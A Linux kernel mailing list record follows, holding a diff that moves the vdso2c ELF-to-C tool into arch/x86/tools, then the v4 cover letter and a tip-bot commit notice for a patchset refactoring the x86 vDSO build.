- outfilename = argv[3];
- outfile = fopen(outfilename, "w");
- if (!outfile)
- err(1, "fopen(%s)", outfilename);
-
- go(raw_addr, raw_len, stripped_addr, stripped_len, outfile, name);
-
- munmap(raw_addr, raw_len);
- munmap(stripped_addr, stripped_len);
- fclose(outfile);
-
- return 0;
-}
diff --git a/arch/x86/entry/vdso/vdso2c.h b/arch/x86/entry/vdso/vdso2c.h
deleted file mode 100644
index 78ed1c1..0000000
--- a/arch/x86/entry/vdso/vdso2c.h
+++ /dev/null
@@ -1,208 +0,0 @@
-/* SPDX-License-Identifier: GPL-2.0 */
-/*
- * This file is included twice from vdso2c.c. It generates code for 32-bit
- * and 64-bit vDSOs. We need both for 64-bit builds, since 32-bit vDSOs
- * are built for 32-bit userspace.
- */
-
-static void BITSFUNC(copy)(FILE *outfile, const unsigned char *data, size_t len)
-{
- size_t i;
-
- for (i = 0; i < len; i++) {
- if (i % 10 == 0)
- fprintf(outfile, "\n\t");
- fprintf(outfile, "0x%02X, ", (int)(data)[i]);
- }
-}
-
-
-/*
- * Extract a section from the input data into a standalone blob. Used to
- * capture kernel-only data that needs to persist indefinitely, e.g. the
- * exception fixup tables, but only in the kernel, i.e. the section can
- * be stripped from the final vDSO image.
- */
-static void BITSFUNC(extract)(const unsigned char *data, size_t data_len,
- FILE *outfile, ELF(Shdr) *sec, const char *name)
-{
- unsigned long offset;
- size_t len;
-
- offset = (unsigned long)GET_LE(&sec->sh_offset);
- len = (size_t)GET_LE(&sec->sh_size);
-
- if (offset + len > data_len)
- fail("section to extract overruns input data");
-
- fprintf(outfile, "static const unsigned char %s[%zu] = {", name, len);
- BITSFUNC(copy)(outfile, data + offset, len);
- fprintf(outfile, "\n};\n\n");
-}
-
-static void BITSFUNC(go)(void *raw_addr, size_t raw_len,
- void *stripped_addr, size_t stripped_len,
- FILE *outfile, const char *image_name)
-{
- int found_load = 0;
- unsigned long load_size = -1; /* Work around bogus warning */
- unsigned long mapping_size;
- ELF(Ehdr) *hdr = (ELF(Ehdr) *)raw_addr;
- unsigned long i, syms_nr;
- ELF(Shdr) *symtab_hdr = NULL, *strtab_hdr, *secstrings_hdr,
- *alt_sec = NULL, *extable_sec = NULL;
- ELF(Dyn) *dyn = 0, *dyn_end = 0;
- const char *secstrings;
- INT_BITS syms[NSYMS] = {};
-
- ELF(Phdr) *pt = (ELF(Phdr) *)(raw_addr + GET_LE(&hdr->e_phoff));
-
- if (GET_LE(&hdr->e_type) != ET_DYN)
- fail("input is not a shared object\n");
-
- /* Walk the segment table. */
- for (i = 0; i < GET_LE(&hdr->e_phnum); i++) {
- if (GET_LE(&pt[i].p_type) == PT_LOAD) {
- if (found_load)
- fail("multiple PT_LOAD segs\n");
-
- if (GET_LE(&pt[i].p_offset) != 0 ||
- GET_LE(&pt[i].p_vaddr) != 0)
- fail("PT_LOAD in wrong place\n");
-
- if (GET_LE(&pt[i].p_memsz) != GET_LE(&pt[i].p_filesz))
- fail("cannot handle memsz != filesz\n");
-
- load_size = GET_LE(&pt[i].p_memsz);
- found_load = 1;
- } else if (GET_LE(&pt[i].p_type) == PT_DYNAMIC) {
- dyn = raw_addr + GET_LE(&pt[i].p_offset);
- dyn_end = raw_addr + GET_LE(&pt[i].p_offset) +
- GET_LE(&pt[i].p_memsz);
- }
- }
- if (!found_load)
- fail("no PT_LOAD seg\n");
-
- if (stripped_len < load_size)
- fail("stripped input is too short\n");
-
- if (!dyn)
- fail("input has no PT_DYNAMIC section -- your toolchain is buggy\n");
-
- /* Walk the dynamic table */
- for (i = 0; dyn + i < dyn_end &&
- GET_LE(&dyn[i].d_tag) != DT_NULL; i++) {
- typeof(dyn[i].d_tag) tag = GET_LE(&dyn[i].d_tag);
- if (tag == DT_REL || tag == DT_RELSZ || tag == DT_RELA ||
- tag == DT_RELENT || tag == DT_TEXTREL)
- fail("vdso image contains dynamic relocations\n");
- }
-
- /* Walk the section table */
- secstrings_hdr = raw_addr + GET_LE(&hdr->e_shoff) +
- GET_LE(&hdr->e_shentsize)*GET_LE(&hdr->e_shstrndx);
- secstrings = raw_addr + GET_LE(&secstrings_hdr->sh_offset);
- for (i = 0; i < GET_LE(&hdr->e_shnum); i++) {
- ELF(Shdr) *sh = raw_addr + GET_LE(&hdr->e_shoff) +
- GET_LE(&hdr->e_shentsize) * i;
- if (GET_LE(&sh->sh_type) == SHT_SYMTAB)
- symtab_hdr = sh;
-
- if (!strcmp(secstrings + GET_LE(&sh->sh_name),
- ".altinstructions"))
- alt_sec = sh;
- if (!strcmp(secstrings + GET_LE(&sh->sh_name), "__ex_table"))
- extable_sec = sh;
- }
-
- if (!symtab_hdr)
- fail("no symbol table\n");
-
- strtab_hdr = raw_addr + GET_LE(&hdr->e_shoff) +
- GET_LE(&hdr->e_shentsize) * GET_LE(&symtab_hdr->sh_link);
-
- syms_nr = GET_LE(&symtab_hdr->sh_size) / GET_LE(&symtab_hdr->sh_entsize);
- /* Walk the symbol table */
- for (i = 0; i < syms_nr; i++) {
- unsigned int k;
- ELF(Sym) *sym = raw_addr + GET_LE(&symtab_hdr->sh_offset) +
- GET_LE(&symtab_hdr->sh_entsize) * i;
- const char *sym_name = raw_addr +
- GET_LE(&strtab_hdr->sh_offset) +
- GET_LE(&sym->st_name);
-
- for (k = 0; k < NSYMS; k++) {
- if (!strcmp(sym_name, required_syms[k].name)) {
- if (syms[k]) {
- fail("duplicate symbol %s\n",
- required_syms[k].name);
- }
-
- /*
- * Careful: we use negative addresses, but
- * st_value is unsigned, so we rely
- * on syms[k] being a signed type of the
- * correct width.
- */
- syms[k] = GET_LE(&sym->st_value);
- }
- }
- }
-
- if (!image_name) {
- fwrite(stripped_addr, stripped_len, 1, outfile);
- return;
- }
-
- mapping_size = (stripped_len + 4095) / 4096 * 4096;
-
- fprintf(outfile, "/* AUTOMATICALLY GENERATED -- DO NOT EDIT */\n\n");
- fprintf(outfile, "#include <linux/linkage.h>\n");
- fprintf(outfile, "#include <linux/init.h>\n");
- fprintf(outfile, "#include <asm/page_types.h>\n");
- fprintf(outfile, "#include <asm/vdso.h>\n");
- fprintf(outfile, "\n");
- fprintf(outfile,
- "static unsigned char raw_data[%lu] __ro_after_init __aligned(PAGE_SIZE) = {",
- mapping_size);
- for (i = 0; i < stripped_len; i++) {
- if (i % 10 == 0)
- fprintf(outfile, "\n\t");
- fprintf(outfile, "0x%02X, ",
- (int)((unsigned char *)stripped_addr)[i]);
- }
- fprintf(outfile, "\n};\n\n");
- if (extable_sec)
- BITSFUNC(extract)(raw_addr, raw_len, outfile,
- extable_sec, "extable");
-
- fprintf(outfile, "const struct vdso_image %s = {\n", image_name);
- fprintf(outfile, "\t.data = raw_data,\n");
- fprintf(outfile, "\t.size = %lu,\n", mapping_size);
- if (alt_sec) {
- fprintf(outfile, "\t.alt = %lu,\n",
- (unsigned long)GET_LE(&alt_sec->sh_offset));
- fprintf(outfile, "\t.alt_len = %lu,\n",
- (unsigned long)GET_LE(&alt_sec->sh_size));
- }
- if (extable_sec) {
- fprintf(outfile, "\t.extable_base = %lu,\n",
- (unsigned long)GET_LE(&extable_sec->sh_offset));
- fprintf(outfile, "\t.extable_len = %lu,\n",
- (unsigned long)GET_LE(&extable_sec->sh_size));
- fprintf(outfile, "\t.extable = extable,\n");
- }
-
- for (i = 0; i < NSYMS; i++) {
- if (required_syms[i].export && syms[i])
- fprintf(outfile, "\t.sym_%s = %" PRIi64 ",\n",
- required_syms[i].name, (int64_t)syms[i]);
- }
- fprintf(outfile, "};\n\n");
- fprintf(outfile, "static __init int init_%s(void) {\n", image_name);
- fprintf(outfile, "\treturn init_vdso_image(&%s);\n", image_name);
- fprintf(outfile, "};\n");
- fprintf(outfile, "subsys_initcall(init_%s);\n", image_name);
-
-}
diff --git a/arch/x86/tools/Makefile b/arch/x86/tools/Makefile
index 7278e25..39a183f 100644
--- a/arch/x86/tools/Makefile
+++ b/arch/x86/tools/Makefile
@@ -38,9 +38,14 @@ $(obj)/insn_decoder_test.o: $(srctree)/tools/arch/x86/lib/insn.c $(srctree)/tool
$(obj)/insn_sanity.o: $(srctree)/tools/arch/x86/lib/insn.c $(srctree)/tools/arch/x86/lib/inat.c $(srctree)/tools/arch/x86/include/asm/inat_types.h $(srctree)/tools/arch/x86/include/asm/inat.h $(srctree)/tools/arch/x86/include/asm/insn.h $(objtree)/arch/x86/lib/inat-tables.c
-HOST_EXTRACFLAGS += -I$(srctree)/tools/include
-hostprogs += relocs
-relocs-objs := relocs_32.o relocs_64.o relocs_common.o
-PHONY += relocs
-relocs: $(obj)/relocs
+HOST_EXTRACFLAGS += -I$(srctree)/tools/include -I$(srctree)/include/uapi \
+ -I$(srctree)/arch/$(SUBARCH)/include/uapi
+
+hostprogs += relocs vdso2c
+relocs-objs := relocs_32.o relocs_64.o relocs_common.o
+
+always-y := $(hostprogs)
+
+PHONY += $(hostprogs)
+$(hostprogs): %: $(obj)/%
@:
diff --git a/arch/x86/tools/vdso2c.c b/arch/x86/tools/vdso2c.c
new file mode 100644
index 0000000..f84e8f8
--- /dev/null
+++ b/arch/x86/tools/vdso2c.c
@@ -0,0 +1,233 @@
+// SPDX-License-Identifier: GPL-2.0-only
+/*
+ * vdso2c - A vdso image preparation tool
+ * Copyright (c) 2014 Andy Lutomirski and others
+ *
+ * vdso2c requires stripped and unstripped input. It would be trivial
+ * to fully strip the input in here, but, for reasons described below,
+ * we need to write a section table. Doing this is more or less
+ * equivalent to dropping all non-allocatable sections, but it's
+ * easier to let objcopy handle that instead of doing it ourselves.
+ * If we ever need to do something fancier than what objcopy provides,
+ * it would be straightforward to add here.
+ *
+ * We're keep a section table for a few reasons:
+ *
+ * The Go runtime had a couple of bugs: it would read the section
+ * table to try to figure out how many dynamic symbols there were (it
+ * shouldn't have looked at the section table at all) and, if there
+ * were no SHT_SYNDYM section table entry, it would use an
+ * uninitialized value for the number of symbols. An empty DYNSYM
+ * table would work, but I see no reason not to write a valid one (and
+ * keep full performance for old Go programs). This hack is only
+ * needed on x86_64.
+ *
+ * The bug was introduced on 2012-08-31 by:
+ * https://code.google.com/p/go/source/detail?r=56ea40aac72b
+ * and was fixed on 2014-06-13 by:
+ * https://code.google.com/p/go/source/detail?r=fc1cd5e12595
+ *
+ * Binutils has issues debugging the vDSO: it reads the section table to
+ * find SHT_NOTE; it won't look at PT_NOTE for the in-memory vDSO, which
+ * would break build-id if we removed the section table. Binutils
+ * also requires that shstrndx != 0. See:
+ * https://sourceware.org/bugzilla/show_bug.cgi?id=17064
+ *
+ * elfutils might not look for PT_NOTE if there is a section table at
+ * all. I don't know whether this matters for any practical purpose.
+ *
+ * For simplicity, rather than hacking up a partial section table, we
+ * just write a mostly complete one. We omit non-dynamic symbols,
+ * though, since they're rather large.
+ *
+ * Once binutils gets fixed, we might be able to drop this for all but
+ * the 64-bit vdso, since build-id only works in kernel RPMs, and
+ * systems that update to new enough kernel RPMs will likely update
+ * binutils in sync. build-id has never worked for home-built kernel
+ * RPMs without manual symlinking, and I suspect that no one ever does
+ * that.
+ */
+
+#include <inttypes.h>
+#include <stdint.h>
+#include <unistd.h>
+#include <stdarg.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+#include <fcntl.h>
+#include <err.h>
+
+#include <sys/mman.h>
+#include <sys/types.h>
+
+#include <tools/le_byteshift.h>
+
+#include <linux/elf.h>
+#include <linux/types.h>
+#include <linux/kernel.h>
+
+const char *outfilename;
+
+struct vdso_sym {
+ const char *name;
+ bool export;
+};
+
+struct vdso_sym required_syms[] = {
+ {"VDSO32_NOTE_MASK", true},
+ {"__kernel_vsyscall", true},
+ {"__kernel_sigreturn", true},
+ {"__kernel_rt_sigreturn", true},
+ {"int80_landing_pad", true},
+ {"vdso32_rt_sigreturn_landing_pad", true},
+ {"vdso32_sigreturn_landing_pad", true},
+};
+
+__attribute__((format(printf, 1, 2))) __attribute__((noreturn))
+static void fail(const char *format, ...)
+{
+ va_list ap;
+ va_start(ap, format);
+ fprintf(stderr, "Error: ");
+ vfprintf(stderr, format, ap);
+ if (outfilename)
+ unlink(outfilename);
+ exit(1);
+ va_end(ap);
+}
+
+/*
+ * Evil macros for little-endian reads and writes
+ */
+#define GLE(x, bits, ifnot) \
+ __builtin_choose_expr( \
+ (sizeof(*(x)) == bits/8), \
+ (__typeof__(*(x)))get_unaligned_le##bits(x), ifnot)
+
+extern void bad_get_le(void);
+#define LAST_GLE(x) \
+ __builtin_choose_expr(sizeof(*(x)) == 1, *(x), bad_get_le())
+
+#define GET_LE(x) \
+ GLE(x, 64, GLE(x, 32, GLE(x, 16, LAST_GLE(x))))
+
+#define PLE(x, val, bits, ifnot) \
+ __builtin_choose_expr( \
+ (sizeof(*(x)) == bits/8), \
+ put_unaligned_le##bits((val), (x)), ifnot)
+
+extern void bad_put_le(void);
+#define LAST_PLE(x, val) \
+ __builtin_choose_expr(sizeof(*(x)) == 1, *(x) = (val), bad_put_le())
+
+#define PUT_LE(x, val) \
+ PLE(x, val, 64, PLE(x, val, 32, PLE(x, val, 16, LAST_PLE(x, val))))
+
+
+#define NSYMS ARRAY_SIZE(required_syms)
+
+#define BITSFUNC3(name, bits, suffix) name##bits##suffix
+#define BITSFUNC2(name, bits, suffix) BITSFUNC3(name, bits, suffix)
+#define BITSFUNC(name) BITSFUNC2(name, ELF_BITS, )
+
+#define INT_BITS BITSFUNC2(int, ELF_BITS, _t)
+
+#define ELF_BITS_XFORM2(bits, x) Elf##bits##_##x
+#define ELF_BITS_XFORM(bits, x) ELF_BITS_XFORM2(bits, x)
+#define ELF(x) ELF_BITS_XFORM(ELF_BITS, x)
+
+#define ELF_BITS 64
+#include "vdso2c.h"
+#undef ELF_BITS
+
+#define ELF_BITS 32
+#include "vdso2c.h"
+#undef ELF_BITS
+
+static void go(void *raw_addr, size_t raw_len,
+ void *stripped_addr, size_t stripped_len,
+ FILE *outfile, const char *name)
+{
+ Elf64_Ehdr *hdr = (Elf64_Ehdr *)raw_addr;
+
+ if (hdr->e_ident[EI_CLASS] == ELFCLASS64) {
+ go64(raw_addr, raw_len, stripped_addr, stripped_len,
+ outfile, name);
+ } else if (hdr->e_ident[EI_CLASS] == ELFCLASS32) {
+ go32(raw_addr, raw_len, stripped_addr, stripped_len,
+ outfile, name);
+ } else {
+ fail("unknown ELF class\n");
+ }
+}
+
+static void map_input(const char *name, void **addr, size_t *len, int prot)
+{
+ off_t tmp_len;
+
+ int fd = open(name, O_RDONLY);
+ if (fd == -1)
+ err(1, "open(%s)", name);
+
+ tmp_len = lseek(fd, 0, SEEK_END);
+ if (tmp_len == (off_t)-1)
+ err(1, "lseek");
+ *len = (size_t)tmp_len;
+
+ *addr = mmap(NULL, tmp_len, prot, MAP_PRIVATE, fd, 0);
+ if (*addr == MAP_FAILED)
+ err(1, "mmap");
+
+ close(fd);
+}
+
+int main(int argc, char **argv)
+{
+ size_t raw_len, stripped_len;
+ void *raw_addr, *stripped_addr;
+ FILE *outfile;
+ char *name, *tmp;
+ int namelen;
+
+ if (argc != 4) {
+ printf("Usage: vdso2c RAW_INPUT STRIPPED_INPUT OUTPUT\n");
+ return 1;
+ }
+
+ /*
+ * Figure out the struct name. If we're writing to a .so file,
+ * generate raw output instead.
+ */
+ name = strdup(argv[3]);
+ namelen = strlen(name);
+ if (namelen >= 3 && !strcmp(name + namelen - 3, ".so")) {
+ name = NULL;
+ } else {
+ tmp = strrchr(name, '/');
+ if (tmp)
+ name = tmp + 1;
+ tmp = strchr(name, '.');
+ if (tmp)
+ *tmp = '\0';
+ for (tmp = name; *tmp; tmp++)
+ if (*tmp == '-')
+ *tmp = '_';
+ }
+
+ map_input(argv[1], &raw_addr, &raw_len, PROT_READ);
+ map_input(argv[2], &stripped_addr, &stripped_len, PROT_READ);
+
+ outfilename = argv[3];
+ outfile = fopen(outfilename, "w");
+ if (!outfile)
+ err(1, "fopen(%s)", outfilename);
+
+ go(raw_addr, raw_len, stripped_addr, stripped_len, outfile, name);
+
+ munmap(raw_addr, raw_len);
+ munmap(stripped_addr, stripped_len);
+ fclose(outfile);
+
+ return 0;
+}
diff --git a/arch/x86/tools/vdso2c.h b/arch/x86/tools/vdso2c.h
new file mode 100644
index 0000000..78ed1c1
--- /dev/null
+++ b/arch/x86/tools/vdso2c.h
@@ -0,0 +1,208 @@
+/* SPDX-License-Identifier: GPL-2.0 */
+/*
+ * This file is included twice from vdso2c.c. It generates code for 32-bit
+ * and 64-bit vDSOs. We need both for 64-bit builds, since 32-bit vDSOs
+ * are built for 32-bit userspace.
+ */
+
+static void BITSFUNC(copy)(FILE *outfile, const unsigned char *data, size_t len)
+{
+ size_t i;
+
+ for (i = 0; i < len; i++) {
+ if (i % 10 == 0)
+ fprintf(outfile, "\n\t");
+ fprintf(outfile, "0x%02X, ", (int)(data)[i]);
+ }
+}
+
+
+/*
+ * Extract a section from the input data into a standalone blob. Used to
+ * capture kernel-only data that needs to persist indefinitely, e.g. the
+ * exception fixup tables, but only in the kernel, i.e. the section can
+ * be stripped from the final vDSO image.
+ */
+static void BITSFUNC(extract)(const unsigned char *data, size_t data_len,
+ FILE *outfile, ELF(Shdr) *sec, const char *name)
+{
+ unsigned long offset;
+ size_t len;
+
+ offset = (unsigned long)GET_LE(&sec->sh_offset);
+ len = (size_t)GET_LE(&sec->sh_size);
+
+ if (offset + len > data_len)
+ fail("section to extract overruns input data");
+
+ fprintf(outfile, "static const unsigned char %s[%zu] = {", name, len);
+ BITSFUNC(copy)(outfile, data + offset, len);
+ fprintf(outfile, "\n};\n\n");
+}
+
+static void BITSFUNC(go)(void *raw_addr, size_t raw_len,
+ void *stripped_addr, size_t stripped_len,
+ FILE *outfile, const char *image_name)
+{
+ int found_load = 0;
+ unsigned long load_size = -1; /* Work around bogus warning */
+ unsigned long mapping_size;
+ ELF(Ehdr) *hdr = (ELF(Ehdr) *)raw_addr;
+ unsigned long i, syms_nr;
+ ELF(Shdr) *symtab_hdr = NULL, *strtab_hdr, *secstrings_hdr,
+ *alt_sec = NULL, *extable_sec = NULL;
+ ELF(Dyn) *dyn = 0, *dyn_end = 0;
+ const char *secstrings;
+ INT_BITS syms[NSYMS] = {};
+
+ ELF(Phdr) *pt = (ELF(Phdr) *)(raw_addr + GET_LE(&hdr->e_phoff));
+
+ if (GET_LE(&hdr->e_type) != ET_DYN)
+ fail("input is not a shared object\n");
+
+ /* Walk the segment table. */
+ for (i = 0; i < GET_LE(&hdr->e_phnum); i++) {
+ if (GET_LE(&pt[i].p_type) == PT_LOAD) {
+ if (found_load)
+ fail("multiple PT_LOAD segs\n");
+
+ if (GET_LE(&pt[i].p_offset) != 0 ||
+ GET_LE(&pt[i].p_vaddr) != 0)
+ fail("PT_LOAD in wrong place\n");
+
+ if (GET_LE(&pt[i].p_memsz) != GET_LE(&pt[i].p_filesz))
+ fail("cannot handle memsz != filesz\n");
+
+ load_size = GET_LE(&pt[i].p_memsz);
+ found_load = 1;
+ } else if (GET_LE(&pt[i].p_type) == PT_DYNAMIC) {
+ dyn = raw_addr + GET_LE(&pt[i].p_offset);
+ dyn_end = raw_addr + GET_LE(&pt[i].p_offset) +
+ GET_LE(&pt[i].p_memsz);
+ }
+ }
+ if (!found_load)
+ fail("no PT_LOAD seg\n");
+
+ if (stripped_len < load_size)
+ fail("stripped input is too short\n");
+
+ if (!dyn)
+ fail("input has no PT_DYNAMIC section -- your toolchain is buggy\n");
+
+ /* Walk the dynamic table */
+ for (i = 0; dyn + i < dyn_end &&
+ GET_LE(&dyn[i].d_tag) != DT_NULL; i++) {
+ typeof(dyn[i].d_tag) tag = GET_LE(&dyn[i].d_tag);
+ if (tag == DT_REL || tag == DT_RELSZ || tag == DT_RELA ||
+ tag == DT_RELENT || tag == DT_TEXTREL)
+ fail("vdso image contains dynamic relocations\n");
+ }
+
+ /* Walk the section table */
+ secstrings_hdr = raw_addr + GET_LE(&hdr->e_shoff) +
+ GET_LE(&hdr->e_shentsize)*GET_LE(&hdr->e_shstrndx);
+ secstrings = raw_addr + GET_LE(&secstrings_hdr->sh_offset);
+ for (i = 0; i < GET_LE(&hdr->e_shnum); i++) {
+ ELF(Shdr) *sh = raw_addr + GET_LE(&hdr->e_shoff) +
+ GET_LE(&hdr->e_shentsize) * i;
+ if (GET_LE(&sh->sh_type) == SHT_SYMTAB)
+ symtab_hdr = sh;
+
+ if (!strcmp(secstrings + GET_LE(&sh->sh_name),
+ ".altinstructions"))
+ alt_sec = sh;
+ if (!strcmp(secstrings + GET_LE(&sh->sh_name), "__ex_table"))
+ extable_sec = sh;
+ }
+
+ if (!symtab_hdr)
+ fail("no symbol table\n");
+
+ strtab_hdr = raw_addr + GET_LE(&hdr->e_shoff) +
+ GET_LE(&hdr->e_shentsize) * GET_LE(&symtab_hdr->sh_link);
+
+ syms_nr = GET_LE(&symtab_hdr->sh_size) / GET_LE(&symtab_hdr->sh_entsize);
+ /* Walk the symbol table */
+ for (i = 0; i < syms_nr; i++) {
+ unsigned int k;
+ ELF(Sym) *sym = raw_addr + GET_LE(&symtab_hdr->sh_offset) +
+ GET_LE(&symtab_hdr->sh_entsize) * i;
+ const char *sym_name = raw_addr +
+ GET_LE(&strtab_hdr->sh_offset) +
+ GET_LE(&sym->st_name);
+
+ for (k = 0; k < NSYMS; k++) {
+ if (!strcmp(sym_name, required_syms[k].name)) {
+ if (syms[k]) {
+ fail("duplicate symbol %s\n",
+ required_syms[k].name);
+ }
+
+ /*
+ * Careful: we use negative addresses, but
+ * st_value is unsigned, so we rely
+ * on syms[k] being a signed type of the
+ * correct width.
+ */
+ syms[k] = GET_LE(&sym->st_value);
+ }
+ }
+ }
+
+ if (!image_name) {
+ fwrite(stripped_addr, stripped_len, 1, outfile);
+ return;
+ }
+
+ mapping_size = (stripped_len + 4095) / 4096 * 4096;
+
+ fprintf(outfile, "/* AUTOMATICALLY GENERATED -- DO NOT EDIT */\n\n");
+ fprintf(outfile, "#include <linux/linkage.h>\n");
+ fprintf(outfile, "#include <linux/init.h>\n");
+ fprintf(outfile, "#include <asm/page_types.h>\n");
+ fprintf(outfile, "#include <asm/vdso.h>\n");
+ fprintf(outfile, "\n");
+ fprintf(outfile,
+ "static unsigned char raw_data[%lu] __ro_after_init __aligned(PAGE_SIZE) = {",
+ mapping_size);
+ for (i = 0; i < stripped_len; i++) {
+ if (i % 10 == 0)
+ fprintf(outfile, "\n\t");
+ fprintf(outfile, "0x%02X, ",
+ (int)((unsigned char *)stripped_addr)[i]);
+ }
+ fprintf(outfile, "\n};\n\n");
+ if (extable_sec)
+ BITSFUNC(extract)(raw_addr, raw_len, outfile,
+ extable_sec, "extable");
+
+ fprintf(outfile, "const struct vdso_image %s = {\n", image_name);
+ fprintf(outfile, "\t.data = raw_data,\n");
+ fprintf(outfile, "\t.size = %lu,\n", mapping_size);
+ if (alt_sec) {
+ fprintf(outfile, "\t.alt = %lu,\n",
+ (unsigned long)GET_LE(&alt_sec->sh_offset));
+ fprintf(outfile, "\t.alt_len = %lu,\n",
+ (unsigned long)GET_LE(&alt_sec->sh_size));
+ }
+ if (extable_sec) {
+ fprintf(outfile, "\t.extable_base = %lu,\n",
+ (unsigned long)GET_LE(&extable_sec->sh_offset));
+ fprintf(outfile, "\t.extable_len = %lu,\n",
+ (unsigned long)GET_LE(&extable_sec->sh_size));
+ fprintf(outfile, "\t.extable = extable,\n");
+ }
+
+ for (i = 0; i < NSYMS; i++) {
+ if (required_syms[i].export && syms[i])
+ fprintf(outfile, "\t.sym_%s = %" PRIi64 ",\n",
+ required_syms[i].name, (int64_t)syms[i]);
+ }
+ fprintf(outfile, "};\n\n");
+ fprintf(outfile, "static __init int init_%s(void) {\n", image_name);
+ fprintf(outfile, "\treturn init_vdso_image(&%s);\n", image_name);
+ fprintf(outfile, "};\n");
+ fprintf(outfile, "subsys_initcall(init_%s);\n", image_name);
+
+}
|
{
"author": "\"tip-bot2 for H. Peter Anvin\" <tip-bot2@linutronix.de>",
"date": "Wed, 14 Jan 2026 00:01:25 -0000",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, by moving the vdso2c tool to
arch/x86/tools, and by merging common code (and especially Makefile
rules) between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation in vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware), skip the stack fixups in the 32-bit kernel entry code and
call int $0x80 directly when invoked from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Bizjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Bizjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
The following commit has been merged into the x86/entry branch of tip:
Commit-ID: 693c819fedcdcabfda7488e2d5e355a84c2fd1b0
Gitweb: https://git.kernel.org/tip/693c819fedcdcabfda7488e2d5e355a84c2fd1b0
Author: H. Peter Anvin <hpa@zytor.com>
AuthorDate: Tue, 16 Dec 2025 13:25:57 -08:00
Committer: Dave Hansen <dave.hansen@linux.intel.com>
CommitterDate: Tue, 13 Jan 2026 15:35:09 -08:00
x86/entry/vdso: Refactor the vdso build
- Separate out the vdso sources into common, vdso32, and vdso64
directories.
- Build the 32- and 64-bit vdsos in their respective subdirectories;
this greatly simplifies the build flags handling.
- Unify the mangling of Makefile flags between the 32- and 64-bit
vdso code as much as possible; all common rules are put in
arch/x86/entry/vdso/common/Makefile.include. The remaining Makefile
is very simple for 32 bits; the 64-bit one is only slightly more
complicated because it contains the x32 generation rule.
- Define __DISABLE_EXPORTS when building the vdso. This need seems to
have been masked by a different ordering of compile flags before.
- Change CONFIG_X86_64 to BUILD_VDSO32_64 in vdso32/system_call.S,
to make it compatible with including fake_32bit_build.h.
